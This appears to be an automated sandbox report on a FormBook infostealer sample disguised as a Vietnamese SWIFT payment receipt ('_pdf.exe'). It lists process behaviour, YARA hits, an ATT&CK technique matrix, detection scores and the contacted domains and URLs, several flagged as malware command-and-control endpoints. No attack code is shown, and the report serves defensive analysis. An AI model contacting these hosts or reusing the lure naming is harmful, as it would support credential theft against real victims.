Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior

Source: C:\Windows\SysWOW64\colorcpl.exe

Code function: 7_2_008F1975 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,

7_2_008F1975

Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected FormBook

Source: Yara match	File source: 4.2.Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe.4afeeb8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe.4a8ee98.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000002.3351494869.0000000003650000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3346916231.0000000003280000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2227875031.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2171913312.00000000048BA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3349619553.0000000003520000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

Remote Access Functionality

Yara detected FormBook

Source: Yara match	File source: 4.2.Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe.4afeeb8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe.4a8ee98.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000002.3351494869.0000000003650000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3346916231.0000000003280000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2227875031.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2171913312.00000000048BA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3349619553.0000000003520000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Shared Modules	1 DLL Side-Loading	512 Process Injection	1 Rootkit	1 Credential API Hooking	1 System Time Discovery	Remote Services	1 Credential API Hooking	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 Abuse Elevation Control Mechanism	1 Masquerading	LSASS Memory	221 Security Software Discovery	Remote Desktop Protocol	1 Archive Collected Data	2 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	11 Disable or Modify Tools	Security Account Manager	2 Process Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	41 Virtualization/Sandbox Evasion	NTDS	41 Virtualization/Sandbox Evasion	Distributed Component Object Model	Input Capture	12 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	512 Process Injection	LSA Secrets	1 Application Window Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Deobfuscate/Decode Files or Information	Cached Domain Credentials	1 File and Directory Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Abuse Elevation Control Mechanism	DCSync	213 System Information Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	4 Obfuscated Files or Information	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	12 Software Packing	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	1 DLL Side-Loading	Network Sniffing	Network Service Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	58%	ReversingLabs	Win32.Trojan.Leonem
Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	53%	Virustotal		Browse
Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Link
www.loyalbahis356.com	1%	Virustotal	Browse
www.jnhdh8827.com	12%	Virustotal	Browse
www.nuevobajonfavorito.com	1%	Virustotal	Browse
www.ma-google.com	1%	Virustotal	Browse
www.guangdongqiangzhetc.com	0%	Virustotal	Browse

URLs

Source	Detection	Scanner	Label	Link
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV	0%	URL Reputation	safe
https://api.msn.com:443/v1/news/Feed/Windows?	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	0%	URL Reputation	safe
https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings	0%	URL Reputation	safe
https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew	0%	URL Reputation	safe
http://www.loyalbahis356.com/pz12/?tX9tN=1bMtYrqh7B54XFQP&uTm4D=mhHbh1AUgvkDqhcxvrHPgmJxw//lx/+38lrQrf/b9xTaJsLm+Z3/RBaY9L5MXxl4E5aW6imDag==	100%	Avira URL Cloud	malware
http://www.autonwheels.comReferer:	0%	Avira URL Cloud	safe
http://www.shrisona.com	100%	Avira URL Cloud	malware
http://www.ainth.com	0%	Avira URL Cloud	safe
https://android.notify.windows.com/iOS	0%	URL Reputation	safe
http://www.pureamyl.com/pz12/www.317wb.com	100%	Avira URL Cloud	malware
https://activity.windows.com/UserActivity.ReadWrite.CreatedByApp	0%	URL Reputation	safe
https://www.msn.com/en-us/news/us/dumb-and-dumber-12-states-with-the-absolute-worst-education-in-the	0%	URL Reputation	safe
https://api.msn.com/v1/news/Feed/Windows?	0%	URL Reputation	safe
http://schemas.micro	0%	URL Reputation	safe
http://www.gabbygomez.com/pz12/www.missorris.com	0%	Avira URL Cloud	safe
https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew	0%	URL Reputation	safe
https://www.msn.com/en-us/money/savingandinvesting/americans-average-net-worth-by-age/ar-AA1h4ngF	0%	Avira URL Cloud	safe
https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehwh2.svg	0%	URL Reputation	safe
http://www.cripmz.xyz	0%	Avira URL Cloud	safe
https://api.msn.com/	0%	URL Reputation	safe
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark	0%	URL Reputation	safe
http://www.shrisona.com/pz12/	100%	Avira URL Cloud	malware
https://www.msn.com:443/en-us/feed	0%	URL Reputation	safe
https://word.office.comM	0%	Avira URL Cloud	safe
www.jnhdh8827.com/pz12/	0%	Avira URL Cloud	safe
http://www.ainth.com	0%	Virustotal		Browse
http://www.gabbygomez.com/pz12/www.missorris.com	2%	Virustotal		Browse
http://www.cripmz.xyz	0%	Virustotal		Browse
http://www.shrisona.com/pz12/	1%	Virustotal		Browse
www.jnhdh8827.com/pz12/	13%	Virustotal		Browse
http://www.shrisona.comReferer:	0%	Avira URL Cloud	safe
http://www.jnhdh8827.com/pz12/www.ma-google.com	0%	Avira URL Cloud	safe
https://www.msn.com/en-us/money/realestate/why-this-florida-city-is-a-safe-haven-from-hurricanes/ar-	0%	Avira URL Cloud	safe
http://www.98980901.com	0%	Avira URL Cloud	safe
http://www.shrisona.com	8%	Virustotal		Browse
http://www.motchillssss.top	100%	Avira URL Cloud	malware
http://www.autonwheels.com	100%	Avira URL Cloud	malware
https://www.msn.com/en-us/news/politics/how-donald-trump-helped-kari-lake-become-arizona-s-and-ameri	0%	Avira URL Cloud	safe
http://www.jnhdh8827.com/pz12/www.ma-google.com	13%	Virustotal		Browse
http://www.loyalbahis356.com/pz12/www.guangdongqiangzhetc.com	100%	Avira URL Cloud	malware
http://www.loyalbahis356.comReferer:	0%	Avira URL Cloud	safe
http://www.motchillssss.top	0%	Virustotal		Browse
http://www.gabbygomez.comReferer:	0%	Avira URL Cloud	safe
http://www.autonwheels.com	6%	Virustotal		Browse
http://www.motchillssss.top/pz12/	100%	Avira URL Cloud	malware
http://www.jnhdh8827.comReferer:	0%	Avira URL Cloud	safe
http://www.cripmz.xyzReferer:	0%	Avira URL Cloud	safe
http://www.98980901.com	1%	Virustotal		Browse
https://wns.windows.com/e	0%	Avira URL Cloud	safe
http://www.nuevobajonfavorito.com	0%	Avira URL Cloud	safe
http://www.98980901.comReferer:	0%	Avira URL Cloud	safe
http://www.slotgame99.bet	0%	Avira URL Cloud	safe
http://www.autonwheels.com/pz12/	100%	Avira URL Cloud	malware
http://www.missorris.comReferer:	0%	Avira URL Cloud	safe
http://www.ma-google.com/pz12/www.ainth.com	0%	Avira URL Cloud	safe
https://api.msn.com/v1/news/Feed/Windows?activityId=435B7A89D7D74BDF801F2DA188906BAF&timeOut=5000&oc	0%	Avira URL Cloud	safe
http://www.317wb.comReferer:	0%	Avira URL Cloud	safe
http://www.motchillssss.top/pz12/	2%	Virustotal		Browse
http://www.slotgame99.bet	7%	Virustotal		Browse
http://www.gabbygomez.com/pz12/	0%	Avira URL Cloud	safe
https://www.msn.com/en-us/travel/news/you-can-t-beat-bobby-flay-s-phoenix-airport-restaurant-one-of-	0%	Avira URL Cloud	safe
http://www.autonwheels.com/pz12/	5%	Virustotal		Browse
http://www.ma-google.comReferer:	0%	Avira URL Cloud	safe
http://www.missorris.com/pz12/www.shrisona.com	100%	Avira URL Cloud	malware
http://www.gabbygomez.com	0%	Avira URL Cloud	safe
http://www.guangdongqiangzhetc.com	0%	Avira URL Cloud	safe
http://www.nuevobajonfavorito.com	1%	Virustotal		Browse
http://www.cripmz.xyz/pz12/www.pureamyl.com	0%	Avira URL Cloud	safe
http://www.autonwheels.com/pz12/www.slotgame99.bet	100%	Avira URL Cloud	malware
http://www.ainth.comReferer:	0%	Avira URL Cloud	safe
http://www.317wb.com	0%	Avira URL Cloud	safe
http://www.loyalbahis356.com	100%	Avira URL Cloud	malware
https://outlook.come	0%	Avira URL Cloud	safe
http://www.missorris.com	0%	Avira URL Cloud	safe
https://www.msn.com/en-us/news/politics/kevin-mccarthy-s-ouster-as-house-speaker-could-cost-gop-its-	0%	Avira URL Cloud	safe
http://www.guangdongqiangzhetc.com/pz12/www.nuevobajonfavorito.com	0%	Avira URL Cloud	safe
http://www.guangdongqiangzhetc.com/pz12/	0%	Avira URL Cloud	safe
http://www.nuevobajonfavorito.comReferer:	0%	Avira URL Cloud	safe
http://www.shrisona.com/pz12/www.cripmz.xyz	100%	Avira URL Cloud	malware
https://api.msn.com/I	0%	Avira URL Cloud	safe
https://loyalbahis356.com/pz12/?tX9tN=1bMtYrqh7B54XFQP&uTm4D=mhHbh1AUgvkDqhcxvrHPgmJxw//lx/	100%	Avira URL Cloud	malware
http://www.ma-google.com	0%	Avira URL Cloud	safe
http://www.jnhdh8827.com	0%	Avira URL Cloud	safe
http://www.guangdongqiangzhetc.comReferer:	0%	Avira URL Cloud	safe
http://www.missorris.com/pz12/	100%	Avira URL Cloud	malware
http://www.ma-google.com/pz12/	0%	Avira URL Cloud	safe
http://www.ainth.com/pz12/www.motchillssss.top	0%	Avira URL Cloud	safe
http://www.nuevobajonfavorito.com/pz12/	100%	Avira URL Cloud	malware
http://www.motchillssss.topReferer:	0%	Avira URL Cloud	safe
http://www.pureamyl.com/pz12/	100%	Avira URL Cloud	malware
http://www.98980901.com/pz12/	0%	Avira URL Cloud	safe
https://www.msn.com/en-us/news/politics/republicans-already-barred-trump-from-being-speaker-of-the-h	0%	Avira URL Cloud	safe
https://www.msn.com/en-us/news/politics/trump-campaign-says-he-raised-more-than-45-million-in-3rd-qu	0%	Avira URL Cloud	safe
http://www.pureamyl.comReferer:	0%	Avira URL Cloud	safe
http://www.slotgame99.bet/pz12/www.gabbygomez.com	0%	Avira URL Cloud	safe
http://www.guangdongqiangzhetc.com/pz12/?uTm4D=rT/73z/FHFKsO0wYdmnc3t2OPINEEa6kIjITgDoEX6ai3/vo6h3AOPFXSKl3lYmsmBcXMl/3wg==&tX9tN=1bMtYrqh7B54XFQP	0%	Avira URL Cloud	safe
http://www.slotgame99.betReferer:	0%	Avira URL Cloud	safe
http://www.98980901.com/pz12/www.autonwheels.com	0%	Avira URL Cloud	safe
http://www.motchillssss.top/pz12/www.98980901.com	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
www.loyalbahis356.com	185.148.106.70	true	false	1%, Virustotal, Browse	unknown
www-guangdongqiangzhetc-com.258fuwu.com	119.3.37.137	true	false		unknown
www.jnhdh8827.com	188.114.96.3	true	true	12%, Virustotal, Browse	unknown
www.guangdongqiangzhetc.com	unknown	unknown	true	0%, Virustotal, Browse	unknown
www.nuevobajonfavorito.com	unknown	unknown	true	1%, Virustotal, Browse	unknown
www.ma-google.com	unknown	unknown	true	1%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://www.loyalbahis356.com/pz12/?tX9tN=1bMtYrqh7B54XFQP&uTm4D=mhHbh1AUgvkDqhcxvrHPgmJxw//lx/+38lrQrf/b9xTaJsLm+Z3/RBaY9L5MXxl4E5aW6imDag==	true	Avira URL Cloud: malware	unknown
www.jnhdh8827.com/pz12/	true	13%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.guangdongqiangzhetc.com/pz12/?uTm4D=rT/73z/FHFKsO0wYdmnc3t2OPINEEa6kIjITgDoEX6ai3/vo6h3AOPFXSKl3lYmsmBcXMl/3wg==&tX9tN=1bMtYrqh7B54XFQP	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.pureamyl.com/pz12/www.317wb.com	explorer.exe, 00000006.00000003.2979320613.000000000C4F7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3075027125.000000000C50B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3372800348.000000000C50B000.00000004.00000001.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://www.shrisona.com	explorer.exe, 00000006.00000003.2979320613.000000000C4F7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3075027125.000000000C50B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3372800348.000000000C50B000.00000004.00000001.00020000.00000000.sdmp	true	8%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://www.autonwheels.comReferer:	explorer.exe, 00000006.00000003.2979320613.000000000C4F7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3075027125.000000000C50B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3372800348.000000000C50B000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.ainth.com	explorer.exe, 00000006.00000003.2979320613.000000000C4F7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3075027125.000000000C50B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3372800348.000000000C50B000.00000004.00000001.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV	explorer.exe, 00000006.00000002.3362876952.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.gabbygomez.com/pz12/www.missorris.com	explorer.exe, 00000006.00000003.2979320613.000000000C4F7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3075027125.000000000C50B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3372800348.000000000C50B000.00000004.00000001.00020000.00000000.sdmp	false	2%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://www.msn.com/en-us/money/savingandinvesting/americans-average-net-worth-by-age/ar-AA1h4ngF	explorer.exe, 00000006.00000000.2160009692.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3362876952.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.cripmz.xyz	explorer.exe, 00000006.00000003.2979320613.000000000C4F7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3075027125.000000000C50B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3372800348.000000000C50B000.00000004.00000001.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://api.msn.com:443/v1/news/Feed/Windows?	explorer.exe, 00000006.00000002.3365438539.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2173161867.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2160009692.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3362876952.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.shrisona.com/pz12/	explorer.exe, 00000006.00000003.2979320613.000000000C4F7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3075027125.000000000C50B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3372800348.000000000C50B000.00000004.00000001.00020000.00000000.sdmp	true	1%, Virustotal, Browse Avira URL Cloud: malware	unknown
https://word.office.comM	explorer.exe, 00000006.00000003.3075508887.000000000C087000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3371448733.000000000C087000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2180275775.000000000C048000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.shrisona.comReferer:	explorer.exe, 00000006.00000003.2979320613.000000000C4F7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3075027125.000000000C50B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3372800348.000000000C50B000.00000004.00000001.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
http://www.jnhdh8827.com/pz12/www.ma-google.com	explorer.exe, 00000006.00000003.2979320613.000000000C4F7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3075027125.000000000C50B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3372800348.000000000C50B000.00000004.00000001.00020000.00000000.sdmp	true	13%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://www.msn.com/en-us/money/realestate/why-this-florida-city-is-a-safe-haven-from-hurricanes/ar-	explorer.exe, 00000006.00000000.2160009692.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3362876952.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.98980901.com	explorer.exe, 00000006.00000003.2979320613.000000000C4F7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3075027125.000000000C50B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3372800348.000000000C50B000.00000004.00000001.00020000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.motchillssss.top	explorer.exe, 00000006.00000003.2979320613.000000000C4F7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3075027125.000000000C50B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3372800348.000000000C50B000.00000004.00000001.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: malware	unknown
